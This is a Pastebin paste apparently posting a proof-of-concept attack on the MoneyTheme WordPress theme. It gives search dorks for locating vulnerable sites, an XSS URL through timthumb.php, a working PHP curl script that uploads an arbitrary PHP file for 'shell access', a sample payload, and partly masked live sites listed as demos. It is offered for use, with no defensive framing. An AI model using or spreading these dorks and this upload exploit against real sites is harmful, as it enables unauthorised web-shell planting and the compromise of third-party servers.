daily pastebin goal
11%
SHARE
TWEET

[POC] Wordpress MoneyTheme Themes XSS | DevilScreaM

Berandal666 Mar 11th, 2017 41 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #Title : Wordpress MoneyTheme Themes XSS / Arbitrary File Upload
  2. #Author : DevilScreaM
  3. #Date : 10/27/2013
  4. #Category : Web Applications
  5. #Type : PHP
  6. #Vendor : http://themesjunction.com
  7. #Link : http://themesjunction.com/theme/money_wordpress_template-17129.html
  8.  
  9.  
  10. #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
  11.  
  12. #Vulnerabillity : XSS, Arbitrary File Upload
  13.  
  14. #Dork :
  15.  
  16. inurl:themes/MoneyTheme/
  17. inurl:wp-content/themes/MoneyTheme/
  18.  
  19.  
  20. Cross Site Scripting
  21.  
  22. Vulnerable At 'timthumb.php'
  23.  
  24. http://site-target/wp-content/themes/MoneyTheme/timthumb.php?src=[XSS].jpg
  25.  
  26. Example :
  27.  
  28. http://cheaXXow.com/wp-content/themes/MoneyTheme/timthumb.php?src=<h1>Berandal</h1>.jpg
  29.  
  30.  
  31. ======
  32.  
  33. Arbitrary File Upload
  34.  
  35. Exploit :
  36.  
  37. <?php
  38.  
  39. $uploadfile="berandal.php";
  40.  
  41. $ch = curl_init("http://site-target/wp-content/themes/MoneyTheme/uploads/upload.php?folder=/wp-content/themes/MoneyTheme/uploads/uploads/");
  42. curl_setopt($ch, CURLOPT_POST, true);
  43. curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
  44. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  45. $postResult = curl_exec($ch);
  46. curl_close($ch);
  47. print "$postResult";
  48.  
  49. ?>
  50.  
  51.  
  52. Shell Access : http://site-target/wp-content/themes/MoneyTheme/uploads/uploads/berandal.php
  53.  
  54. berandal.php
  55. <?php
  56. phpinfo();
  57. ?>
  58.  
  59. Demo :
  60.  
  61. http://weXXX.com/wp-content/themes/MoneyTheme/uploads/upload.php
  62. http://coXXXash.com/wp-content/themes/MoneyTheme/uploads/upload.php
RAW Paste Data
Top